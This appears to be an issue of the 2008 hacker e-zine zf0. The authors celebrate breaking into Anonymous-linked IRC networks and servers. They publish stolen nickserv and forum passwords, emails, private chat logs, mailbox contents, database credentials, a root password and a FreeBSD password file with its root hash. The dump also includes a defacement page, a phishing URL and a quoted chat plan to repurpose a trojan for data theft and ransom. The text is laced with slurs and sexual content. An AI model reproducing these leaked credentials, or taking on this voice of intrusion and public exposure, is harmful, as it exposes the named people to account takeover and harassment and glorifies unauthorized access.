zf0 hack

2023-11-03

 
    _/_/_/_/_/                              444444444                                 ~~~~~~
         _/     _/_/    _/  _/_/   _/_/    4;;;;;;;;4   Internet Superheroes               ~
      _/     _/_/_/_/  _/_/     _/    _/  4;;;;;;;;;4
   _/       _/        _/       _/    _/  4;;;;44;;;;4       With great power
_/_/_/_/_/   _/_/_/  _/         _/_/    4;;;;4 4;;;;4            comes great responsibility.
                                       4;;;;4  4;;;;4
       .` .`              .`.`        4;;;;4   4;;;;4                       And great babes.
      -+;//.             `;/;/-      4;;;;444444;;;;444
     -++%+.               `/+/+-`    4;;;;;;;;;;;;;;;;4
    -o%/o;                 -++/+;`   4444444444;;;;;444  ______                          __ 
   .+0%+o-                 `/+;/+-             4;;;;4   |      |.--.--.--.-----.-----.--|  |
   /0%-oo;``               `+o;;o/`            4;;;;4   |  --  ||  |  |  |     |  -__|  _  |
  `+0/.+ossoo+/.`` ` `;//+++oo-.++-            444444   |______||________|__|__|_____|_____|
  -0%;`-/++ooooo+o/++oossso++/`.oo;
  -0%oossssssssssssssssyssssso+oss/                            -- Table of 0wned --
   -/0o/-/syyyyyyyyyyyyyyyo;;/oso/`
     ``;yhyyhhhydddddyyhhyhy/` `                            1. Anonymous
    -ohhs//dmy/ymmmmmy;omdo+yho-`                           2. g00ns
-symmho;` /Nm+.sNNNNmo.;mm+``;sddo//`                       3. illmob
oNNdo-`   +Nd; ;NNNNh; .dNo`  `-odNd;                       4. Safety on the Internet
oMm+`     oNy- `sNNmo` `hNs.     /mm/`                      5. Robert Lemos 
/Nd;      +Ns.  -hds.  `sNs.     .dm/`                      6. The Fed Jingle
.md;      +No`   ..`   `sNs.     `dd/                       7. Comodo
`om;      ;ms.         `yNo`     .mh-                       8. CF0
 .do`     .dy-         `hd/      ;mo`                       9. Blackcode
  ;y-     `+m;         .ms.     `yy;                       10. Trivia Security
  `/+`     .ho`        +h/      ;y/`                       11. Pwnie Awards
   `-.      ;d;       .h+`      ;;`                        12. The Cult of the Dead Cow
     `      `;/`     `oo.      ``                          13. Pwnee Awards




                        S y m a n t e c  -  T h r e a t C o n           
                  ---------------------------------------------
                  |             Level 6: # rm -rf /*          |
                  | (//6) |
                  ---t h i s o n e g o e s u p t o s i x---^---


At last the 2008 show! The torch-song no-one ever sings! The curfew chorus line! 
The comedy divine! The bulging eyes of puppets, strangled by their strings. 
There's thrills and chills and girls galore, there's sing-songs and surprises! 
There's something here for everyone, reserve your seat today!

We're happy to be have you back. Do we ever have some treats! We have some sweet
articles. We rm'ed g00ns, we took a successful forray into Anonymous' world, we
conquered and destroyed Blackcode, and, of course, we have the Cult of the Dead Cow 
owned and exposed. We top those off with lots of fun little owns and articles. Kick
up your feet and settle in, this is going to take all night.


zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0
zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
zf0                                                                                 zf0
zf0                                    Anonymous                                    zf0
zf0                                                                                 zf0
zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0
zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0



/***********************************
*
* We owned Anonymous. Although they sell you the idea that they cannot be owned
* because they lack any structure, we owned anybody and anything involved that we 
* wanted to. They had a quote about being unable to kill a dragon with no head. We
* just watch the dragon stumble around drunkenly and then we stab all its toes.  
*
* We owned inky_'s main server, we owned partyvan.info, we owned a lot of people
* and sites that were not worth including in this article. The anon scene is massive
* and we owned whatever we wanted, and brought owns and lulz here for you. They get
* a lot of press and talk a lot of shit (fucking annoying ED pages too), but all
* they really are is the *chan community rebranded (currently) around the idea of
* destroying the CoS. ^ban^ basically says that if you are a channer, you're anon,
* and if you aren't, you aren't.
*
* A lot of the top guys have no respect for the morons dedicated to their cause,
* and don't mind abusing or misleading them (to which they so easily follow).  They
* don't mind money either, as we will demonstrate. Something stinks about this, it
* reminds me of *something*, if only I could remember what...
*
* The most talented people in Anonymous hack Scientology people. Think about that.
* In the hacking world, that places them below the people who hacked 
* ethelsflowershop.com and above the people who DoS specialneeds.com.
*
* We could be dropping your names, addresses, and email addresses, but you're kids,
* we do have some mercy.
*
* On with the show!
*
***********************************/

// Hey it's that guy who tried to take over 4chan. Check out his IRC problems!
Xyrix -> nickserv@anonymous.services: REGISTER 01110 x.yr.ix@hotmail.com
Xyrix -> nickserv@anonymous.services: REGISTER Xyrix A1B2C x.yr.ix@hotmail.com
Xyrix -> nickserv@anonymous.services: REGISTER Xyrix A1B2C3 x.yr.ix@hotmail.com
Xyrix -> nickserv@anonymous.services: REGISTER Xyrix c0ncr3t3456 x.yr.ix@hotmail.com
Xyrix -> nickserv@anonymous.services: REGISTER Xyrix lolol x.yr.ix@hotmail.com
Xyrix -> nickserv@anonymous.services: REGISTER Xyrix maniclol x.yr.ix@hotmail.com
Xyrix -> nickserv@anonymous.services: REGISTER help

Speaking of which, it looks like we got a fan after rming g00ns:

From:  X Y <xyrix@live.com>
To:  superheroes@hushmail.com
Date:  Thu, 08 May 2008 19:03:20 +0100
This message is not encrypted, and is not digitally signed by .
Hey, I was just wondering where you guys hung out normally. Irc or on silc?

// Some select passes, starting with the [nig] bitches
[nig]A_Non_E_Moose_ -> nickserv@anonymous.services: IDENTIFY qrrbrbirlbel
[nig]Azure -> nickserv@anonymous.services: identify niceguyjin
[nig]Azure -> nickserv@anonymous.services: identify nigguyjin
[nig]Banhammer -> nickserv@anonymous.services: identify letmein
[nig]CircleK -> nickserv: register bullpass1
[nig]Dart27 -> nickserv@anonymous.services: register midnight3 insurgentdart27@gmail.com
[nig]Dravas -> nickserv: identify x8i9j9w
[nig]Kazimir -> nickserv: identify wood.lake
[nig]Moose -> nickserv@anonymous.services: identify qrrbrbirlbel
[nig]Picatta -> NickServ: IDENTIFY lolcats8295
[nig]Skorski -> nickserv: identify internethate
[nig]Spaise -> nickserv: identify 198956spaise
[nig]Tycho -> NickServ: IDENTIFY auli711
[nig]banhammer -> nickserv@anonymous.services: identify letmein
[nig]brambi -> NickServ: IDENTIFY exodus
[nig]codenaur -> nickserv: REGISTER bobbin codenaur@omfgawd.org
[nig]kando -> nickserv: identify qwerty
[nig]kando -> nickserv: identify qwertyui
[nig]msgmcmuffin -> nickserv: identify haX0rm3plz
[nig]neG -> nickserv: identify fucktits
[nig]shamrock -> nickserv@anonymous.services: identify jimmy123
[nig]spic -> nickserv: identify alphabette
[nig]squid -> nickserv: identify w00tah

// Some other passes of (mostly) relevant people in the anon scene
inky_ -> nickserv: identify jblink
Alyosha -> nickserv: identify CLEVERPASSWD1111
RickRollington -> nickserv: identify muddymuddykipz
Rorschach -> nickserv@anonymous.services: IDENTIFY saltywalrus
Tycho -> NickServ: IDENTIFY auli711
negroe -> nickserv: ghost TheShining jewslol
negroe -> nickserv: identify aspadmd1
Kerx -> NickServ: identify hit13r
Freeze` -> nickserv@anonymous.services: identify wtfuxsucks
SpunkWang -> NickServ: IDENTIFY SpunkWang!
trypta -> nickserv: identify moveon
Nihilanth -> nickserv: identify bper231a
Skorski -> nickserv@anonymous.services: ghost Deltantor slowpoke
Muhu -> nickserv@anonymous.services: IDENTIFY niggershit7
Fail-chan -> nickserv@anonymous.services: identify cocks123
Delacroix -> nickserv: id lulzy1
f0rked -> nickserv@anonymous.services: id holyshit
_meh_ -> NICKSERV: IDENTIFY iamroot
innocuous -> nickserv: identify thepassword.
innocuous -> nickserv: identify thenickpassword.
innocuous -> nickserv: identify thenickpass.
Ms_Mister -> nickserv@anonymous.services: identify farkman
trapnest -> nickserv: identify aichii32
DrMengele -> NickServ: identify mofo47
bittwist -> nickserv@anonymous.services: identify sun42
Spaise -> nickserv: identify 1898956spaise
nfinity0 -> NickServ: identify bluemonkey66
infinity0 -> NickServ: register Ivy saturation6666 infinity0x@gmail.com
Cobrian -> Nickserv: identify Amiga32
cheezmasta_ -> nickserv@anonymous.services: IDENTIFY iamthecheese101
denvetta -> NickServ: IDENTIFY madman01

codenaur -> nickserv: IDENTIFY thaergaerg
codenaur -> nickserv: identify bobbin
codenaur -> nickserv: identify ilovecock // We can't make this shit up

RickRollington -> chanserv: identify #insurgency h875n8w45h89

/*
*
* Let's start it off with #el/i/tes
* 
*/

^ban^ -> #el/i/tes: We are True Anonymous.
// And we are watching.

// ^ban^ is one of the big names in anonymous.. "old anon".. check out his
brilliant ideas!
^ban^ -> #el/i/tes: well, a suggestion for a board name
^ban^ -> #el/i/tes: I don't suggest we model after said board though
^ban^ -> #el/i/tes: http://4-ch.net/dqn/
^ban^ -> #el/i/tes: The Elitist Superstructure of DQN
^ban^ -> #el/i/tes: (The Elitist Superstructure of TPN you might recognize,
Nihilanth)

// ^ban^ had his docs dropped already, big drama

// And we finally know what old anon care about - money
Kerx -> #el/i/tes: So we're not gonna sit on asses and have yet another person
run our wiki and have him profit of us
Kerx -> #el/i/tes: time once and for all to buy own server and do our shit on
it and rent out space to make teh money
Freeze` -> #el/i/tes: and how would that work
Freeze` -> #el/i/tes: I'm all eyes here
Kerx -> #el/i/tes: just how the guy running anonhost is doing his
Kerx -> #el/i/tes: and we've got an easy way to secure money with the xenu
raids
Kerx -> #el/i/tes: make sure we have some true reps for the wiki go out and
collect in person also on next raid

// More money
Kerx -> #el/i/tes: ^ban^ we already has a way to get a ton of dough

// More money
Picatta -> #el/i/tes: and we're putting a couple ads on it

// More money
Picatta -> #el/i/tes: We could do a proxy list and put ads on it

// They are masters of technology and contemporary security issues
TheShining -> #el/i/tes: but we can't tell anyone
TheShining -> #el/i/tes: outside of this room
TheShining -> #el/i/tes: i was thinking about us getting a trojan
TheShining -> #el/i/tes: but modifying it
TheShining -> #el/i/tes: completely
TheShining -> #el/i/tes: until everything is changed to that virus scanners
wont pick it up
TheShining -> #el/i/tes: and distribute it to as many computers as possible
TheShining -> #el/i/tes: and take as much personal information as possible
TheShining -> #el/i/tes: and or hold the computers for ransom
Freeze` -> #el/i/tes: hmm
Freeze` -> #el/i/tes: if you could really do that
Freeze` -> #el/i/tes: I'd help out
TheShining -> #el/i/tes: the hardest part is to re-do the code on the trojan
TheShining -> #el/i/tes: and we'd also have to keep this secret until we had at
least 10,000 zombies

// omg anonymous revealed
031811:fuckingfruit -> #el/i/tes: he's waiting for kakama (the leader of
anonymous) to decide if to delete a wiki page or not

// Kakama's site and yahoo phish page: http://login.yahoo.890m.com/yahoo.html

// The illustrious ^ban^ explains that anon aren't hackers, they're channers,
and if you're not a channer, you're not anon
clorox -> ^ban^: you have alot of enemies...i am one of them
clorox -> ^ban^: you were a faggot when we first came here to me
^ban^ -> clorox: there's a pretty simple explanation for that, you know
^ban^ -> clorox: I was here when partyvan was founded, and didn't like the idea
of it abandoning the entire idea for it's founding :|
^ban^ -> clorox: The original idea was to have a network for anon, by anon, and
only anon
clorox -> ^ban^: what makes you anon
^ban^ -> clorox: but things didn't happen that way
^ban^ -> clorox: by anon I mean anyone from the *chan culture
// IF YOU WANT TO BE ANON CLOROX YOU HAVE TO BE MORE CHAN


/*
*
* Who wants to read the private chats of 711staff?
*
*/

// I beg to differ
jewlion -> #711staff: this is your only warning
jewlion -> #711staff: what happens in here
jewlion -> #711staff: stays in here

// Ego
lolihaetfire -> #711staff: Actually, christ, who are our other admins?
inky_ -> #711staff: ^Bi am the other admin
lolihaetfire -> #711staff: danke
inky_ -> #711staff: why the hell does nobody acknowledge me
inky_ -> #711staff: they're always like 'jewlion this' 'jewlion that'
inky_ -> #711staff: if it wasn't for me this site wouldn't even exist

// And rank
syense -> #711staff: we sure will miss jewlion though.
Kakama -> #711staff: WHAT
Kakama -> #711staff: HUH?
Kakama -> #711staff: JEWLION GO WHERE?
syense -> #711staff: he has stepped down.
syense -> #711staff: hes getting marrieda
DaftWally -> #711staff: I assumed inky_ would take over
syense -> #711staff: well he will
[nig]Dravas -> #711staff: lol
syense -> #711staff: hell be primary, with necro as second, and me as third
DaftWally -> #711staff: can I be 4th? :3
[nig]Dravas -> #711staff: can i be 5th :3
syense -> #711staff: daftwally will probably be 4th

// And more rank
jewlion -> #711staff: if the site goes down
jewlion -> #711staff: you'll have to be the one to take care of shit
jewlion -> #711staff: Necrobilly and MisterCow are the only one's I'd trust
with the site rite nao :|
jewlion -> #711staff: but MisterCow isn't here

// They're all about the money, too
UnknownUser -> #711staff: I have a great idea
UnknownUser -> #711staff: we could sell account levels
UnknownUser -> #711staff: like say a platnum acount gets you unlimited access
to all pictures
[nig]ItsNotLupus -> #711staff: syense: wat
UnknownUser -> #711staff: where as a normal account you can only look at 5 pics
in a min

// Money can buy you status
jewlion -> #711staff: I gave admin to those who donated
jewlion -> #711staff: and have been mods forever

Dart27 -> #711staff: I was an accident. My mom said, "the ONE time me and your
father had sex I got pregnant"

Dart27 -> #711staff: Anyways, I've only made one thing in PHP.
Dart27 -> #711staff: But it is cool.

Tycho -> #711staff: why are you so hard over her anony
anony -> #711staff: because i want my cock in her ass this summer
Tycho -> #711staff: be sure to get vids
anony -> #711staff: lewl
NotDaftWally -> #711staff: yeah
anony -> #711staff: i copy+pasted that to her :3
anony -> #711staff: on msn
Tycho -> #711staff: i fucking hate you anony
anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you
     (7802934048) says:
anony -> #711staff: LOLOLOLOLOLOLOLOLOL
anony -> #711staff: Phill says:
anony -> #711staff: we're so having buttsex.
anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you
     (7802934048) says:
anony -> #711staff: No anal. Last time I tried anal I cried.

lulzwhut -> #711staff: so
lulzwhut -> #711staff: syense is like actually dead
[nig]jewlion -> #711staff: yeah
ECB -> #711staff: wut happened
[nig]jewlion -> #711staff: fluid leak
[nig]jewlion -> #711staff: in his car
[nig]jewlion -> #711staff: dunno wat
ECB -> #711staff: so i get his o:line?!?!
[nig]jewlion -> #711staff: but it caused him to hit a semi

Tycho -> #711staff: <Necrobilly> I shoulda backed everything up

Tycho -> #711staff: WHEN YOURE POUNDING A GIRL FROM BEHIND
Tycho -> #711staff: AND HER BACK ARCHES
Tycho -> #711staff: THAT IS FUCKING HOT
Howler -> #711staff: guys can do that too

// 711staff paypal. Word to the wise: disable it
Dravas -> #711staff: dravas@loliheaven.net 

inky_ -> #711staff: apu and aero are what host 711

anony -> #711staff: it felt like i stole keri from you
anony -> #711staff: so I stopped talking to her
andy -> #711staff: uh
andy -> #711staff: lost stole her
andy -> #711staff: from all of you

/*
*
* There's this "blackops" group that tried to be something, but they just
generate humour
*
*/

MDK -> #blackops: yeh we need a pw thats easy to remember
Spaise -> #blackops: umm what about
Spaise -> #blackops: opsareblack

Spaise -> #blackops: anything else we neeD?
Spaise -> #blackops: ummm
Spaise -> #blackops: flood protection
MDK -> #blackops: how do you change the topic with this script?

carbonlesz -> #blackops: ... Damnit, MDK. Stop capitalizing random letters of
words in passwords.

// He means the IRC channel mode
Spaise -> #blackops: hmm cant have private set if its secret
Spaise -> #blackops: grr

carbonlesz -> #blackops: I should probably use a proxy.

/*
*
* The guys running the wiki are incompetent
* 
*/

f0rked -> #wiki: oh, I thought it was ddosed or something
denvetta -> #wiki: picatta's away somewhere
denvetta -> #wiki: Well.. that's possible... but picatta assures me that the
server is ddos proof

infinity0 -> #wiki: WedTM: NO. nothing was hacked
infinity0 -> #wiki: it was just an exploit in the mediawiki software

Picatta -> #wiki: OH ASHI-
Picatta -> #wiki: DHIT
Picatta -> #wiki:  /var is full

Apon71 -> #wiki: Big problems with nameserver?
Picatta -> #wiki: yes
Apon71 -> #wiki: Ok, I trust you guys will fix it as always
Apon71 -> #wiki: I've been away for a week, and am trying to catch up on what's
happening
Picatta -> #wiki: I can't really do shit until wedtm gets back

Apon71 -> #wiki: Either the wiki got hacked
Apon71 -> #wiki: Or one of you is trying to scare away newfags
Ivy -> #wiki: Apon71: yeah it's someone trying to scare away newfags, i'm
guessing Kakama, sigh

januszeal -> #wiki: why is the wiki down
januszeal -> #wiki: in before, after, and during slowpoke
Picatta -> #wiki: well

a-n-o-n -> #wiki: wtf...
a-n-o-n -> #wiki: wiki down?
Kakama -> #wiki: ATTENTION SHOPPERS

infinity0 -> #wiki: Picatta: wiki down again... we should split up the SQL
server vs. the webserver again

denvetta -> #wiki: wiki down
denvetta -> #wiki: can someone add it to /topi?

// They actually had the most successful individual security strategy we came
// across - the wiki was down for the majority of the time we had it owned. 
// Made it a big pain in the ass and mostly we didn't bother.


/*
*
* #anti includes people behind ED. We were hoping oclet would be passing 0day
* around, but the only thing he has or passes is drugs. He's mostly a failure 
* at this hacker thing but wins at lulz.
*
*/

Talldog -> #anti: Having seen a woman be fucked by a horse, my pants feel
strangely empty
hep -> #anti: i saw women getting fucked by horses when i was still bbsing
oclet -> #anti: ive seen .millions of girls getting fucked by horses just on
accident

sabotage -> #anti: i miss tacos
sabotage -> #anti: i banged tacos like 10 times too
Shortcat -> #anti: what happen
oclet -> #anti: me2
sabotage -> #anti: i think she was on top and i started to cum
oclet -> #anti: lets gang bang her  
sabotage -> #anti: and i threw her off

oclet -> #anti: i searched facebook with my last name
oclet -> #anti: theres a lotof bitches i might be related to who are bangin

hep -> #anti: i am a one dick kind of girl

hep -> #anti: having a vagina does not entitle you to autorespect

// Just imagine more of the above, that's 100% of their conversations


/*
*
* And basically everyone else in the community is a joker. Here are some random
* quotes
*
*/

paraphren -> _Shinigami_: Think she's hot?
http://photos-c.ak.facebook.com/photos-ak-sf2p/v195/7/84/788288923/n788288923_3
51134_2156.jpg
_Shinigami_ -> paraphren: fuck yes
paraphren -> _Shinigami_: She's 18. Want a chance to fuck her? 
_Shinigami_ -> paraphren: yes pls
paraphren -> _Shinigami_: heh
_Shinigami_ -> paraphren: lol
paraphren -> _Shinigami_: Well, first thing... don't mention any of this to
ANYBODY.
_Shinigami_ -> paraphren: k
paraphren -> _Shinigami_: I will quite literally have to kill you. heh
_Shinigami_ -> paraphren: lol k
paraphren -> _Shinigami_: Secondly... I have to talk her into it. She's coming
to Toronto to fuck me and wants to film it and shit, but I can let you have a
go at her if you want. heh
paraphren -> _Shinigami_: Anyway, she's a dirty girl and I'll probably be in
the room too. So hope you're up for it. :p
_Shinigami_ -> paraphren: lol, sounds fine to me
_Shinigami_ -> paraphren: i can be the videographer if you want 
paraphren -> _Shinigami_: Seriously though... very important you tell NOBODY.
haha 

CuNt -> Eric: w/e dude i do have a life other than computers
CuNt -> Eric: and i guarentee its a shit load better than yours
Eric -> CuNt: *rollseyes*
Eric -> CuNt: sureeeee buddy
CuNt -> Eric: sureeee buddy
Eric -> CuNt: I make more in a week then u do in a year
CuNt -> Eric: what do u make then dude
Eric -> CuNt: I bang more chicks in a month that u ever will

d0ct0r -> Eric: how did you join a haxs' group.
Eric -> d0ct0r: obviously I knew me shit
Eric -> d0ct0r: perl, vb, c, the basics

Agent_Riding -> #Philadelphia: so gnome is like the explorer.exe of ubuntu

TurbUlated -> anon080: <- sortofwant
anon080 -> TurbUlated: oh.
anon080 -> TurbUlated: your secret is safe

mattheas -> #fallout: How do I add people
mattheas -> #fallout: what's the command
anon64 -> #fallout: /invite

srgrnr -> #fallout: i want to go back to high school
srgrnr -> #fallout: where i had friends.
anon64 -> #fallout: high school was gay
srgrnr -> #fallout: i had friends, dude.

srgrnr -> #fallout: HOW THE FUCK
srgrnr -> #fallout: DO I UNIGNORE SOMEONE
srgrnr -> #fallout: ON IRC

Phist -> #illmob: Spyd3r: jewlion is one of the top submitters on darknet
Phist -> #illmob: 16 year old anon- turned compsec ethic expert

Eugene -> HetGezicht: I don't have skills for ddos

skinless -> Consumerwhore: feel like giving me a short explanation of how to
get into a site?
skinless -> Consumerwhore: i have php python and perl

kayla -> codenaur:
http://www.google.co.uk/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla
%3Aen-GB%3Aofficial&hs=BBT&q=warning%3A+incompatible+implicit+declaration+of+bu
ilt-in+function+memcpy&btnG=Search&meta=
kayla -> codenaur: memcpy is a function
codenaur -> kayla: ah
codenaur -> kayla: :D
codenaur -> kayla: Thanks <3

// Shit this isn't very anonymous
barbanon -> #socal: Gregg Hagglund up in Canada has been tagged as the leader
there

QED|Pi -> Machine-Gunner: I'll just say they're for Stephen.A
Machine-Gunner -> QED|Pi: oh fuck
Machine-Gunner -> QED|Pi: :P
QED|Pi -> Machine-Gunner: Nice..
Machine-Gunner -> QED|Pi: Fuuuuuck
Machine-Gunner -> QED|Pi: How did you know
QED|Pi -> Machine-Gunner: it's your ident
QED|Pi -> Machine-Gunner: Stephen.A.@desu-C67BC7B.carleton.ca

// We owned this. It's between "Not worth mentioning" and "Not worth its own
// section", so we drop it here
define(SQLHOST, 'lulzhost.net');		//MySQL server address, usually
localhost
define(SQLUSER, 'img'); 	//MySQL user (must be changed)
define(SQLPASS, '3ecaa923-4c0e-4526-9f44-c8a437d88bb5');	     //MySQL
user's password (must be changed)
define(SQLDB, 'img');		//Database used by image board
define(ADMIN_PASS, 'fgt');	//Janitor password  (CHANGE THIS YO)

// BANG ON - Give this guy a medal and put him in charge (except he's not dumb
// enough to accept responsibility for this crap shoot)
Orakio -> #programming: Anonymous = mostly idiots.
Orakio -> #programming: Don't work directly with them.
Orakio -> #programming: It's better to linger on the edges, find a good
subgroup.
Orakio -> #programming: I mean I hate scientology and I don't need to be in
some group called anonymous to express that hate.
Orakio -> #programming: Especially when they can't even renew their domain
names.
Orakio -> #programming: It's a liability to be too closely intergrated.
// He has a 30-character nickserv password. No joke.

GaiaKB -> #privateprivategaia: ServicesUp|Sun Mar 30 04:05:51 EDT 2008|~! Do
NOT talk about #privateprivategaia
GaiaKB -> #privateprivategaia: Something|Sun Mar 30 04:09:59 EDT 2008|~!
Everything discussed here, stays here

// ZF0 has magic powers that can read your conversations even (yes, even!!) if
// you're using SSL!
ian -> #spk: i pasted that in spk
ian -> #spk: he cant know that
ian -> #spk: i use ssl

/*
*
* Picatta's spools took up a lot of space, so here's just some mails clean and
* clear 
*
*/

/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
Dear Hitlerlol,

Thank you for registering at the Megadeth Forums. Before we can activate your
account one last step must be taken to complete your registration.

Please note - you must complete this last step to become a registered member.
You will only need to visit this url once to activate your account.

To complete your registration, please visit this url: 
http://forums.megadeth.com/register.php?a=act&amp;u=69022&amp;i=27200622 

<a
href="http://forums.megadeth.com/register.php?a=act&amp;u=69022&amp;i=27200622"
>America Online Users Please Visit Here to be Activated</a>

**** Does The Above URL Not Work? **** 
If the above url does not work, please use your Web browser to go to:
http://forums.megadeth.com/register.php?a=ver 

Please be sure not to add extra spaces. You will need to type in your username
and activation number on the page that appears when you visit the url. 

Your Username is: Hitlerlol
Your Activation ID is: 27200622

If you are still having problems signing up please contact a member of our
support staff at webmaster@megadeth.com

All the best,
Megadeth Forums
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/


/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
Hi,

You have requested to register the following nickname Picatta.

Please type " /msg NickServ confirm u95oIIpO3 " to complete registration.

If you don't know why this mail was sent to you, please ignore it silently.

PLEASE DON'T ANSWER TO THIS MAIL!

Rizon administrators.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/


/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
Dear Picatta,

Thank you for registering at Bodybuilding.com. Before we can activate
your account one last step must be taken to complete your
registration.

Please note - you must complete this last step to become a registered
member. You will only need to visit this url once to activate your
account.

To complete your registration, please visit this url:
http://my.bodybuilding.com/register.php?a=3Dact&amp;u=3D13453212&amp;i=3D725985
83

<a
href="http://partyvan.info/serialized/3D%22http://my.bodybuilding.com/register.
php?a=3Dact&amp;u=3D13453212&amp;i=3D=" 72598583="">America
Online Users Please Visit Here to be Activated</a>

**** Does The Above URL Not Work? ****
If the above url does not work, please use your Web browser to go to:
http://my.bodybuilding.com/register.php?a=3Dver

Please be sure to type it exactly as it appears. You will need to type
in your Username and Activation ID on the page that appears when you
visit the url.

Your Username is: Picatta
Your Activation ID is: 72598583

If you are still having problems signing up please contact a member of
our support staff at support@bodybuilding.com.

All the best,
Bodybuilding.com
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/


/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
Welcome to forum.i2p Forums

Please keep this email for your records. Your account information is as
follows:

----------------------------
Username: Picatta
Password: lolcats8295
----------------------------

Please do not forget your password as it has been encrypted in our database and
we cannot retrieve it for you. However, should you forget your password you can
request a new one which will be activated in the same way as this account.

Thank you for registering.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/


/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
Welcome to Operation Clambake Message Board Forums

Please keep this email for your records. Your account information is as
follows:

----------------------------
Username: Picatta
Password: loldongs
----------------------------

Your account is currently inactive, the administrator of the board will need to
activate it before you can log in. You will receive another email when this has
occured.

Please do not forget your password as it has been encrypted in our database and
we cannot retrieve it for you. However, should you forget your password you can
request a new one which will be activated in the same way as this account.

Thank you for registering.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/


/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
Welcome to Enturbulation.org Forums

Please keep this email for your records. Your account information is as f=
ollows:

----------------------------
Username: Picatta
Password: 86500144
----------------------------

Your account is currently inactive. You cannot use it until you visit the=
 following link:
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/


/*
*
* Now let's get to the box pwning. This is inky's server that hosts a handful
of their shitty sites
*
*/

drwxr-xr-x   4 root   wheel  512 Feb 14 03:05 bbs.711chan.org
drwxr-xr-x   4 root   wheel  512 Feb  6 07:03 invalid.site
drwxr-xr-x   4 httpd  httpd  512 Jan 26 09:24 lt3c.info
drwxr-xr-x   4 root   wheel  512 Feb  1 15:41 maps.lt3c.info
drwxr-xr-x   4 root   wheel  512 Feb 19 01:42 no-tolerance.info
drwxr-xr-x   4 root   wheel  512 Feb  7 06:53 partyvanradio.org
drwxr-xr-x   4 root   wheel  512 Mar  7 15:13 untitledhosting.org
drwxr-xr-x   4 root   wheel  512 Feb 19 19:15 virtual.psychomatic.us
drwxr-xr-x   4 root   wheel  512 Mar 11 04:13 vzpp.untitledhosting.org
lrwxr-xr-x   1 root   wheel   10 Jan 26 09:24 www.lt3c.info -> lt3c.info/
lrwxr-xr-x   1 root   wheel   18 Feb 19 01:43 www.no-tolerance.info ->
no-tolerance.info/
lrwxr-xr-x   1 root   wheel   18 Feb  7 06:53 www.partyvanradio.org ->
partyvanradio.org/
lrwxr-xr-x   1 root   wheel   20 Mar  7 15:13 www.untitledhosting.org ->
untitledhosting.org/

$config['db_username'] = 'untitledhosting';
$config['db_password'] = '0DTtITKJ.yBD';

$dbhost = 'localhost';
$dbport = '3306';
$dbname = 'lt3c_phpbb';
$dbuser = 'root';
$dbpasswd = 'jblink';

// ^ that's the root pw too! And his nickserv pass! We rooted the box too fast
// to even have to look up his nickserv pass

$db_server = 'localhost';
$db_name = 'nt-server';
$db_user = 'nt-server';
$db_passwd = 'nm2KHZaWzwZbWrxT';
$db_prefix = 'smf_';

$config['dbms'] = 'mysql';
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'untitledhosting';
$config['db_password'] = '0DTtITKJ.yBD';
$config['db_name'] = 'untitledhosting';

d><title>hacked by [seven11]</title></head><body bgcolor="black">
<div align="center" style="color:#FFFFFF"><h1>Hacked by <font
color="red">[seven11]inky</font>, [PURGE] are a load of faggots</h1><br></div>
</body></html>

// ^ haha

# shoutcast
Password=imadj
AdminPassword=partyvanorg


# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$40oTVDjS$IXT5EmlwEhu84acMjAZ/J/:0:0::0:0:Root User:/root:/usr/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
